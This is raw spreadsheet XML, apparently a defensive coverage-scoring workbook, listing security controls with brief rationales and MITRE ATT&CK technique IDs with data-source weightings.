  <c r="B212" i="9"/>
  <c r="K211" i="9"/>
  <c r="I211" i="9"/>
  <c r="B211" i="9"/>
  <c r="K210" i="9"/>
  <c r="I210" i="9"/>
  <c r="B210" i="9"/>
  <c r="K209" i="9"/>
  <c r="I209" i="9"/>
  <c r="B209" i="9"/>
  <c r="K208" i="9"/>
  <c r="I208" i="9"/>
  <c r="B208" i="9"/>
  <c r="K207" i="9"/>
  <c r="I207" i="9"/>
  <c r="B207" i="9"/>
  <c r="K206" i="9"/>
  <c r="I206" i="9"/>
  <c r="B206" i="9"/>
  <c r="K205" i="9"/>
  <c r="I205" i="9"/>
  <c r="B205" i="9"/>
  <c r="K204" i="9"/>
  <c r="I204" i="9"/>
  <c r="B204" i="9"/>
  <c r="K203" i="9"/>
  <c r="I203" i="9"/>
  <c r="B203" i="9"/>
  <c r="K202" i="9"/>
  <c r="I202" i="9"/>
  <c r="B202" i="9"/>
  <c r="K201" i="9"/>
  <c r="I201" i="9"/>
  <c r="B201" i="9"/>
  <c r="K200" i="9"/>
  <c r="I200" i="9"/>
  <c r="B200" i="9"/>
  <c r="K199" i="9"/>
  <c r="I199" i="9"/>
  <c r="B199" i="9"/>
  <c r="K198" i="9"/>
  <c r="I198" i="9"/>
  <c r="B198" i="9"/>
  <c r="K197" i="9"/>
  <c r="I197" i="9"/>
  <c r="B197" i="9"/>
  <c r="K196" i="9"/>
  <c r="I196" i="9"/>
  <c r="B196" i="9"/>
  <c r="K195" i="9"/>
  <c r="I195" i="9"/>
  <c r="B195" i="9"/>
  <c r="K194" i="9"/>
  <c r="I194" i="9"/>
  <c r="B194" i="9"/>
  <c r="K193" i="9"/>
  <c r="I193" i="9"/>
  <c r="B193" i="9"/>
  <c r="K192" i="9"/>
  <c r="I192" i="9"/>
  <c r="B192" i="9"/>
  <c r="K191" i="9"/>
  <c r="I191" i="9"/>
  <c r="B191" i="9"/>
  <c r="K190" i="9"/>
  <c r="I190" i="9"/>
  <c r="B190" i="9"/>
  <c r="K189" i="9"/>
  <c r="I189" i="9"/>
  <c r="B189" i="9"/>
  <c r="K188" i="9"/>
  <c r="I188" i="9"/>
  <c r="B188" i="9"/>
  <c r="K187" i="9"/>
  <c r="I187" i="9"/>
  <c r="B187" i="9"/>
  <c r="K186" i="9"/>
  <c r="I186" i="9"/>
  <c r="B186" i="9"/>
  <c r="K185" i="9"/>
  <c r="I185" i="9"/>
  <c r="B185" i="9"/>
  <c r="K184" i="9"/>
  <c r="I184" i="9"/>
  <c r="B184" i="9"/>
  <c r="K183" i="9"/>
  <c r="I183" i="9"/>
  <c r="B183" i="9"/>
  <c r="K182" i="9"/>
  <c r="I182" i="9"/>
  <c r="B182" i="9"/>
  <c r="K181" i="9"/>
  <c r="I181" i="9"/>
  <c r="B181" i="9"/>
  <c r="K180" i="9"/>
  <c r="I180" i="9"/>
  <c r="B180" i="9"/>
  <c r="K179" i="9"/>
  <c r="I179" i="9"/>
  <c r="B179" i="9"/>
  <c r="K178" i="9"/>
  <c r="I178" i="9"/>
  <c r="B178" i="9"/>
  <c r="K177" i="9"/>
  <c r="I177" i="9"/>
  <c r="B177" i="9"/>
  <c r="K176" i="9"/>
  <c r="I176" i="9"/>
  <c r="B176" i="9"/>
  <c r="K175" i="9"/>
  <c r="I175" i="9"/>
  <c r="B175" i="9"/>
  <c r="K174" i="9"/>
  <c r="I174" i="9"/>
  <c r="B174" i="9"/>
  <c r="K173" i="9"/>
  <c r="I173" i="9"/>
  <c r="B173" i="9"/>
  <c r="K172" i="9"/>
  <c r="I172" i="9"/>
  <c r="B172" i="9"/>
  <c r="K171" i="9"/>
  <c r="I171" i="9"/>
  <c r="B171" i="9"/>
  <c r="K170" i="9"/>
  <c r="I170" i="9"/>
  <c r="B170" i="9"/>
  <c r="K169" i="9"/>
  <c r="I169" i="9"/>
  <c r="B169" i="9"/>
  <c r="K168" i="9"/>
  <c r="I168" i="9"/>
  <c r="B168" i="9"/>
  <c r="K167" i="9"/>
  <c r="I167" i="9"/>
  <c r="B167" i="9"/>
  <c r="K166" i="9"/>
  <c r="I166" i="9"/>
  <c r="B166" i="9"/>
  <c r="K165" i="9"/>
  <c r="I165" i="9"/>
  <c r="B165" i="9"/>
  <c r="K164" i="9"/>
  <c r="I164" i="9"/>
  <c r="B164" i="9"/>
  <c r="K163" i="9"/>
  <c r="I163" i="9"/>
  <c r="B163" i="9"/>
  <c r="K162" i="9"/>
  <c r="I162" i="9"/>
  <c r="B162" i="9"/>
  <c r="K161" i="9"/>
  <c r="I161" i="9"/>
  <c r="B161" i="9"/>
  <c r="K160" i="9"/>
  <c r="I160" i="9"/>
  <c r="B160" i="9"/>
  <c r="K159" i="9"/>
  <c r="I159" i="9"/>
  <c r="B159" i="9"/>
  <c r="K158" i="9"/>
  <c r="I158" i="9"/>
  <c r="B158" i="9"/>
  <c r="K157" i="9"/>
  <c r="I157" i="9"/>
  <c r="B157" i="9"/>
  <c r="K156" i="9"/>
  <c r="I156" i="9"/>
  <c r="B156" i="9"/>
  <c r="K155" i="9"/>
  <c r="I155" i="9"/>
  <c r="B155" i="9"/>
  <c r="K154" i="9"/>
  <c r="I154" i="9"/>
  <c r="B154" i="9"/>
  <c r="K153" i="9"/>
  <c r="I153" i="9"/>
  <c r="B153" i="9"/>
  <c r="K152" i="9"/>
  <c r="I152" i="9"/>
  <c r="B152" i="9"/>
  <c r="K151" i="9"/>
  <c r="I151" i="9"/>
  <c r="B151" i="9"/>
  <c r="K150" i="9"/>
  <c r="I150" i="9"/>
  <c r="B150" i="9"/>
  <c r="K149" i="9"/>
  <c r="I149" i="9"/>
  <c r="B149" i="9"/>
  <c r="K148" i="9"/>
  <c r="I148" i="9"/>
  <c r="B148" i="9"/>
  <c r="K147" i="9"/>
  <c r="I147" i="9"/>
  <c r="B147" i="9"/>
  <c r="K146" i="9"/>
  <c r="I146" i="9"/>
  <c r="B146" i="9"/>
  <c r="K145" i="9"/>
  <c r="I145" i="9"/>
  <c r="B145" i="9"/>
  <c r="K144" i="9"/>
  <c r="I144" i="9"/>
  <c r="B144" i="9"/>
  <c r="K143" i="9"/>
  <c r="I143" i="9"/>
  <c r="B143" i="9"/>
  <c r="K142" i="9"/>
  <c r="I142" i="9"/>
  <c r="B142" i="9"/>
  <c r="K141" i="9"/>
  <c r="I141" i="9"/>
  <c r="B141" i="9"/>
  <c r="K140" i="9"/>
  <c r="I140" i="9"/>
  <c r="B140" i="9"/>
  <c r="K139" i="9"/>
  <c r="I139" i="9"/>
  <c r="B139" i="9"/>
  <c r="K138" i="9"/>
  <c r="I138" i="9"/>
  <c r="B138" i="9"/>
  <c r="K137" i="9"/>
  <c r="I137" i="9"/>
  <c r="B137" i="9"/>
  <c r="K136" i="9"/>
  <c r="I136" i="9"/>
  <c r="B136" i="9"/>
  <c r="K135" i="9"/>
  <c r="I135" i="9"/>
  <c r="B135" i="9"/>
  <c r="K134" i="9"/>
  <c r="I134" i="9"/>
  <c r="B134" i="9"/>
  <c r="K133" i="9"/>
  <c r="I133" i="9"/>
  <c r="B133" i="9"/>
  <c r="K132" i="9"/>
  <c r="I132" i="9"/>
  <c r="B132" i="9"/>
  <c r="K131" i="9"/>
  <c r="I131" i="9"/>
  <c r="B131" i="9"/>
  <c r="K130" i="9"/>
  <c r="I130" i="9"/>
  <c r="B130" i="9"/>
  <c r="K129" i="9"/>
  <c r="I129" i="9"/>
  <c r="B129" i="9"/>
  <c r="K128" i="9"/>
  <c r="I128" i="9"/>
  <c r="B128" i="9"/>
  <c r="K127" i="9"/>
  <c r="I127" i="9"/>
  <c r="B127" i="9"/>
  <c r="K126" i="9"/>
  <c r="I126" i="9"/>
  <c r="B126" i="9"/>
  <c r="K125" i="9"/>
  <c r="I125" i="9"/>
  <c r="B125" i="9"/>
  <c r="K124" i="9"/>
  <c r="I124" i="9"/>
  <c r="B124" i="9"/>
  <c r="K123" i="9"/>
  <c r="I123" i="9"/>
  <c r="B123" i="9"/>
  <c r="K122" i="9"/>
  <c r="I122" i="9"/>
  <c r="B122" i="9"/>
  <c r="K121" i="9"/>
  <c r="I121" i="9"/>
  <c r="B121" i="9"/>
  <c r="K120" i="9"/>
  <c r="I120" i="9"/>
  <c r="B120" i="9"/>
  <c r="K119" i="9"/>
  <c r="I119" i="9"/>
  <c r="B119" i="9"/>
  <c r="K118" i="9"/>
  <c r="I118" i="9"/>
  <c r="B118" i="9"/>
  <c r="K117" i="9"/>
  <c r="I117" i="9"/>
  <c r="B117" i="9"/>
  <c r="K116" i="9"/>
  <c r="I116" i="9"/>
  <c r="B116" i="9"/>
  <c r="K115" i="9"/>
  <c r="I115" i="9"/>
  <c r="B115" i="9"/>
  <c r="K114" i="9"/>
  <c r="I114" i="9"/>
  <c r="B114" i="9"/>
  <c r="K113" i="9"/>
  <c r="I113" i="9"/>
  <c r="B113" i="9"/>
  <c r="K112" i="9"/>
  <c r="I112" i="9"/>
  <c r="B112" i="9"/>
  <c r="K111" i="9"/>
  <c r="I111" i="9"/>
  <c r="B111" i="9"/>
  <c r="K110" i="9"/>
  <c r="I110" i="9"/>
  <c r="B110" i="9"/>
  <c r="K109" i="9"/>
  <c r="I109" i="9"/>
  <c r="B109" i="9"/>
  <c r="K108" i="9"/>
  <c r="I108" i="9"/>
  <c r="B108" i="9"/>
  <c r="K107" i="9"/>
  <c r="I107" i="9"/>
  <c r="B107" i="9"/>
  <c r="K106" i="9"/>
  <c r="I106" i="9"/>
  <c r="B106" i="9"/>
  <c r="K105" i="9"/>
  <c r="I105" i="9"/>
  <c r="B105" i="9"/>
  <c r="K104" i="9"/>
  <c r="I104" i="9"/>
  <c r="B104" i="9"/>
  <c r="K103" i="9"/>
  <c r="I103" i="9"/>
  <c r="B103" i="9"/>
  <c r="K102" i="9"/>
  <c r="I102" i="9"/>
  <c r="B102" i="9"/>
  <c r="K101" i="9"/>
  <c r="I101" i="9"/>
  <c r="B101" i="9"/>
  <c r="K100" i="9"/>
  <c r="I100" i="9"/>
  <c r="B100" i="9"/>
  <c r="K99" i="9"/>
  <c r="I99" i="9"/>
  <c r="B99" i="9"/>
  <c r="K98" i="9"/>
  <c r="I98" i="9"/>
  <c r="B98" i="9"/>
  <c r="K97" i="9"/>
  <c r="I97" i="9"/>
  <c r="B97" i="9"/>
  <c r="K96" i="9"/>
  <c r="I96" i="9"/>
  <c r="B96" i="9"/>
  <c r="K95" i="9"/>
  <c r="I95" i="9"/>
  <c r="B95" i="9"/>
  <c r="K94" i="9"/>
  <c r="I94" i="9"/>
  <c r="B94" i="9"/>
  <c r="K93" i="9"/>
  <c r="I93" i="9"/>
  <c r="B93" i="9"/>
  <c r="K92" i="9"/>
  <c r="I92" i="9"/>
  <c r="B92" i="9"/>
  <c r="K91" i="9"/>
  <c r="I91" i="9"/>
  <c r="B91" i="9"/>
  <c r="K90" i="9"/>
  <c r="I90" i="9"/>
  <c r="B90" i="9"/>
  <c r="K89" i="9"/>
  <c r="I89" i="9"/>
  <c r="B89" i="9"/>
  <c r="K88" i="9"/>
  <c r="I88" i="9"/>
  <c r="B88" i="9"/>
  <c r="K87" i="9"/>
  <c r="I87" i="9"/>
  <c r="B87" i="9"/>
  <c r="K86" i="9"/>
  <c r="I86" i="9"/>
  <c r="B86" i="9"/>
  <c r="K85" i="9"/>
  <c r="I85" i="9"/>
  <c r="B85" i="9"/>
  <c r="K84" i="9"/>
  <c r="I84" i="9"/>
  <c r="B84" i="9"/>
  <c r="K83" i="9"/>
  <c r="I83" i="9"/>
  <c r="B83" i="9"/>
  <c r="K82" i="9"/>
  <c r="I82" i="9"/>
  <c r="B82" i="9"/>
  <c r="K81" i="9"/>
  <c r="I81" i="9"/>
  <c r="B81" i="9"/>
  <c r="K80" i="9"/>
  <c r="I80" i="9"/>
  <c r="B80" i="9"/>
  <c r="K79" i="9"/>
  <c r="I79" i="9"/>
  <c r="B79" i="9"/>
  <c r="K78" i="9"/>
  <c r="I78" i="9"/>
  <c r="B78" i="9"/>
  <c r="K77" i="9"/>
  <c r="I77" i="9"/>
  <c r="B77" i="9"/>
  <c r="K76" i="9"/>
  <c r="I76" i="9"/>
  <c r="B76" i="9"/>
  <c r="K75" i="9"/>
  <c r="I75" i="9"/>
  <c r="B75" i="9"/>
  <c r="K74" i="9"/>
  <c r="I74" i="9"/>
  <c r="B74" i="9"/>
  <c r="K73" i="9"/>
  <c r="I73" i="9"/>
  <c r="B73" i="9"/>
  <c r="K72" i="9"/>
  <c r="I72" i="9"/>
  <c r="B72" i="9"/>
  <c r="K71" i="9"/>
  <c r="I71" i="9"/>
  <c r="B71" i="9"/>
  <c r="K70" i="9"/>
  <c r="I70" i="9"/>
  <c r="B70" i="9"/>
  <c r="K69" i="9"/>
  <c r="I69" i="9"/>
  <c r="B69" i="9"/>
  <c r="K68" i="9"/>
  <c r="I68" i="9"/>
  <c r="B68" i="9"/>
  <c r="K67" i="9"/>
  <c r="I67" i="9"/>
  <c r="B67" i="9"/>
  <c r="K66" i="9"/>
  <c r="I66" i="9"/>
  <c r="B66" i="9"/>
  <c r="K65" i="9"/>
  <c r="I65" i="9"/>
  <c r="B65" i="9"/>
  <c r="K64" i="9"/>
  <c r="I64" i="9"/>
  <c r="B64" i="9"/>
  <c r="K63" i="9"/>
  <c r="I63" i="9"/>
  <c r="B63" i="9"/>
  <c r="K62" i="9"/>
  <c r="I62" i="9"/>
  <c r="B62" i="9"/>
  <c r="K61" i="9"/>
  <c r="I61" i="9"/>
  <c r="B61" i="9"/>
  <c r="K60" i="9"/>
  <c r="I60" i="9"/>
  <c r="B60" i="9"/>
  <c r="K59" i="9"/>
  <c r="I59" i="9"/>
  <c r="B59" i="9"/>
  <c r="K58" i="9"/>
  <c r="I58" i="9"/>
  <c r="B58" i="9"/>
  <c r="K57" i="9"/>
  <c r="I57" i="9"/>
  <c r="B57" i="9"/>
  <c r="K56" i="9"/>
  <c r="I56" i="9"/>
  <c r="B56" i="9"/>
  <c r="K55" i="9"/>
  <c r="I55" i="9"/>
  <c r="B55" i="9"/>
  <c r="K54" i="9"/>
  <c r="I54" i="9"/>
  <c r="B54" i="9"/>
  <c r="K53" i="9"/>
  <c r="I53" i="9"/>
  <c r="B53" i="9"/>
  <c r="K52" i="9"/>
  <c r="I52" i="9"/>
  <c r="B52" i="9"/>
  <c r="K51" i="9"/>
  <c r="I51" i="9"/>
  <c r="B51" i="9"/>
  <c r="K50" i="9"/>
  <c r="I50" i="9"/>
  <c r="B50" i="9"/>
  <c r="K49" i="9"/>
  <c r="I49" i="9"/>
  <c r="B49" i="9"/>
  <c r="K48" i="9"/>
  <c r="I48" i="9"/>
  <c r="B48" i="9"/>
  <c r="K47" i="9"/>
  <c r="I47" i="9"/>
  <c r="B47" i="9"/>
  <c r="K46" i="9"/>
  <c r="I46" i="9"/>
  <c r="B46" i="9"/>
  <c r="K45" i="9"/>
  <c r="I45" i="9"/>
  <c r="B45" i="9"/>
  <c r="K44" i="9"/>
  <c r="I44" i="9"/>
  <c r="B44" i="9"/>
  <c r="K43" i="9"/>
  <c r="I43" i="9"/>
  <c r="B43" i="9"/>
  <c r="K42" i="9"/>
  <c r="I42" i="9"/>
  <c r="B42" i="9"/>
  <c r="K41" i="9"/>
  <c r="I41" i="9"/>
  <c r="B41" i="9"/>
  <c r="K40" i="9"/>
  <c r="I40" i="9"/>
  <c r="B40" i="9"/>
  <c r="K39" i="9"/>
  <c r="I39" i="9"/>
  <c r="B39" i="9"/>
  <c r="K38" i="9"/>
  <c r="I38" i="9"/>
  <c r="B38" i="9"/>
  <c r="K37" i="9"/>
  <c r="I37" i="9"/>
  <c r="B37" i="9"/>
  <c r="K36" i="9"/>
  <c r="I36" i="9"/>
  <c r="B36" i="9"/>
  <c r="K35" i="9"/>
  <c r="I35" i="9"/>
  <c r="B35" i="9"/>
  <c r="K34" i="9"/>
  <c r="I34" i="9"/>
  <c r="B34" i="9"/>
  <c r="K33" i="9"/>
  <c r="I33" i="9"/>
  <c r="B33" i="9"/>
  <c r="K32" i="9"/>
  <c r="I32" i="9"/>
  <c r="B32" i="9"/>
  <c r="K31" i="9"/>
  <c r="I31" i="9"/>
  <c r="B31" i="9"/>
  <c r="K30" i="9"/>
  <c r="I30" i="9"/>
  <c r="B30" i="9"/>
  <c r="K29" i="9"/>
  <c r="I29" i="9"/>
  <c r="B29" i="9"/>
  <c r="K28" i="9"/>
  <c r="I28" i="9"/>
  <c r="B28" i="9"/>
  <c r="K27" i="9"/>
  <c r="I27" i="9"/>
  <c r="B27" i="9"/>
  <c r="K26" i="9"/>
  <c r="I26" i="9"/>
  <c r="B26" i="9"/>
  <c r="K25" i="9"/>
  <c r="I25" i="9"/>
  <c r="B25" i="9"/>
  <c r="K24" i="9"/>
  <c r="I24" i="9"/>
  <c r="B24" i="9"/>
  <c r="K23" i="9"/>
  <c r="I23" i="9"/>
  <c r="B23" i="9"/>
  <c r="K22" i="9"/>
  <c r="I22" i="9"/>
  <c r="B22" i="9"/>
  <c r="K21" i="9"/>
  <c r="I21" i="9"/>
  <c r="B21" i="9"/>
  <c r="K20" i="9"/>
  <c r="I20" i="9"/>
  <c r="B20" i="9"/>
  <c r="K19" i="9"/>
  <c r="I19" i="9"/>
  <c r="B19" i="9"/>
  <c r="K18" i="9"/>
  <c r="I18" i="9"/>
  <c r="B18" i="9"/>
  <c r="K17" i="9"/>
  <c r="I17" i="9"/>
  <c r="B17" i="9"/>
  <c r="K16" i="9"/>
  <c r="I16" i="9"/>
  <c r="B16" i="9"/>
  <c r="K15" i="9"/>
  <c r="I15" i="9"/>
  <c r="B15" i="9"/>
  <c r="K14" i="9"/>
  <c r="I14" i="9"/>
  <c r="B14" i="9"/>
  <c r="K13" i="9"/>
  <c r="I13" i="9"/>
  <c r="B13" i="9"/>
  <c r="K12" i="9"/>
  <c r="I12" i="9"/>
  <c r="B12" i="9"/>
  <c r="K11" i="9"/>
  <c r="I11" i="9"/>
  <c r="B11" i="9"/>
  <c r="K10" i="9"/>
  <c r="I10" i="9"/>
  <c r="B10" i="9"/>
  <c r="K9" i="9"/>
  <c r="I9" i="9"/>
  <c r="B9" i="9"/>
  <c r="K8" i="9"/>
  <c r="I8" i="9"/>
  <c r="B8" i="9"/>
  <c r="K7" i="9"/>
  <c r="I7" i="9"/>
  <c r="B7" i="9"/>
  <c r="K6" i="9"/>
  <c r="I6" i="9"/>
  <c r="B6" i="9"/>
  <c r="K5" i="9"/>
  <c r="I5" i="9"/>
  <c r="B5" i="9"/>
  <c r="K4" i="9"/>
  <c r="I4" i="9"/>
  <c r="B4" i="9"/>
  <c r="K3" i="9"/>
  <c r="I3" i="9"/>
  <c r="B3" i="9"/>
  <c r="K2" i="9"/>
  <c r="I2" i="9"/>
  <c r="B2" i="9"/>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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="7755" uniqueCount="3113">
  <si>
    <t>Defense</t>
  </si>
  <si>
    <t>Rationale</t>
  </si>
  <si>
    <t>Coverage</t>
  </si>
  <si>
    <t>Maintainability</t>
  </si>
  <si>
    <t>Confidence</t>
  </si>
  <si>
    <t>Score</t>
  </si>
  <si>
    <t>Anti-virus</t>
  </si>
  <si>
    <t>AV on email, host and proxy</t>
  </si>
  <si>
    <t>Application whitelisting</t>
  </si>
  <si>
    <t>Limited application</t>
  </si>
  <si>
    <t>Autoruns Analysis</t>
  </si>
  <si>
    <t>Binary Analysis</t>
  </si>
  <si>
    <t>Part of the EDR solution</t>
  </si>
  <si>
    <t>Data Execution Prevention</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>Exploit Prevention</t>
  </si>
  <si>
    <t>File monitoring</t>
  </si>
  <si>
    <t>File system access controls</t>
  </si>
  <si>
    <t>Limited implementation</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>Micro segmentation routed through firewalls, No host based firewalling</t>
  </si>
  <si>
    <t>Heuristic detection</t>
  </si>
  <si>
    <t>Host forensic analysis</t>
  </si>
  <si>
    <t>Host intrusion prevention systems</t>
  </si>
  <si>
    <t>Log analysis</t>
  </si>
  <si>
    <t>Implemented SIEM and operational threat hunters</t>
  </si>
  <si>
    <t>Login Credentials</t>
  </si>
  <si>
    <t>Logging from AD and local machines</t>
  </si>
  <si>
    <t>Multi-Factor Authentication</t>
  </si>
  <si>
    <t>Network intrusion prevention systems</t>
  </si>
  <si>
    <t>Process Whitelisting</t>
  </si>
  <si>
    <t>No implemented</t>
  </si>
  <si>
    <t>Signature-based detection</t>
  </si>
  <si>
    <t>System access controls</t>
  </si>
  <si>
    <t>User Mode Signature Validation</t>
  </si>
  <si>
    <t>Only allow signed macros and plugins</t>
  </si>
  <si>
    <t>Whitelisting by file name or path</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Data Source</t>
  </si>
  <si>
    <t>Weight</t>
  </si>
  <si>
    <t>Datasources</t>
  </si>
  <si>
    <t>Weights</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>Items in Refence vs Items in this sheet</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>25;25;25;25</t>
  </si>
  <si>
    <t>T1002</t>
  </si>
  <si>
    <t>20;20;30;30</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>50;20;30</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>35;30;35</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>40;60</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>15;23;22;15;25</t>
  </si>
  <si>
    <t>T1009</t>
  </si>
  <si>
    <t>33;34;33</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>35;25;40</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>49;51</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>30;20;50</t>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <t>20;20;20;20;20</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>20;40;40</t>
  </si>
  <si>
    <t>T1015</t>
  </si>
  <si>
    <t>40;30;30</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>T1017</t>
  </si>
  <si>
    <t>35;35;30</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>30;20;25;25</t>
  </si>
  <si>
    <t>T1019</t>
  </si>
  <si>
    <t>33;33;34</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>T1022</t>
  </si>
  <si>
    <t>40;15;25;20</t>
  </si>
  <si>
    <t>T1023</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>T1026</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>8;8;8;8;8;9;10;8;9;8;8;8</t>
  </si>
  <si>
    <t>T1028</t>
  </si>
  <si>
    <t>15;20;20;20;25</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>30;30;20;20</t>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>30;20;20;30</t>
  </si>
  <si>
    <t>T1032</t>
  </si>
  <si>
    <t>20;15;15;15;15;20</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>25;25;50</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>45;55</t>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>40;20;40</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>30;30;15;25</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>30;70</t>
  </si>
  <si>
    <t>T1042</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>30;30;30;10</t>
  </si>
  <si>
    <t>T1044</t>
  </si>
  <si>
    <t>T1045</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>10;15;20;15;20;20</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>35;65</t>
  </si>
  <si>
    <t>T1050</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>60;40</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>10;20;35;35</t>
  </si>
  <si>
    <t>T1054</t>
  </si>
  <si>
    <t>40;35;25</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>16;16;16;17;18;17</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>20;30;30;20</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <t>30;30;40</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <t>70;30</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>T1063</t>
  </si>
  <si>
    <t>25;35;40</t>
  </si>
  <si>
    <t>T1064</t>
  </si>
  <si>
    <t>33;30;37</t>
  </si>
  <si>
    <t>T1065</t>
  </si>
  <si>
    <t>T1066</t>
  </si>
  <si>
    <t>T1067</t>
  </si>
  <si>
    <t>45;35;20</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>30;40;30</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>15;30;25;15;15</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>10;15;20;20;15;10</t>
  </si>
  <si>
    <t>T1073</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>T1075</t>
  </si>
  <si>
    <t>T1076</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>25;35;15;25</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>65;35</t>
  </si>
  <si>
    <t>T1079</t>
  </si>
  <si>
    <t>35;35;15;15</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>T1084</t>
  </si>
  <si>
    <t>T1085</t>
  </si>
  <si>
    <t>15;25;40;20</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>20;15;30;35</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>T1088</t>
  </si>
  <si>
    <t>25;20;35;20</t>
  </si>
  <si>
    <t>T1089</t>
  </si>
  <si>
    <t>20;10;20;15;20;15</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>30;20;30;20</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>T1093</t>
  </si>
  <si>
    <t>T1094</t>
  </si>
  <si>
    <t>15;20;20;10;10;15;10</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>15;20;20;15;10;20</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <t>30;10;30;30</t>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>T1099</t>
  </si>
  <si>
    <t>40;25;35</t>
  </si>
  <si>
    <t>T1100</t>
  </si>
  <si>
    <t>T1101</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>10;25;20;20;25</t>
  </si>
  <si>
    <t>T1103</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>25;15;20;15;25</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>20;10;20;20;15;15</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>T1107</t>
  </si>
  <si>
    <t>40;40;20</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>10;20;10;10;20;20;10</t>
  </si>
  <si>
    <t>T1109</t>
  </si>
  <si>
    <t>10;30;30;30</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>30;15;15;30;30</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>45;30;25</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>35;25;15;25</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>T1118</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <t>T1122</t>
  </si>
  <si>
    <t>30;35;35</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t xml:space="preserve">T1125 </t>
  </si>
  <si>
    <t>T1126</t>
  </si>
  <si>
    <t>25;35;20;30</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
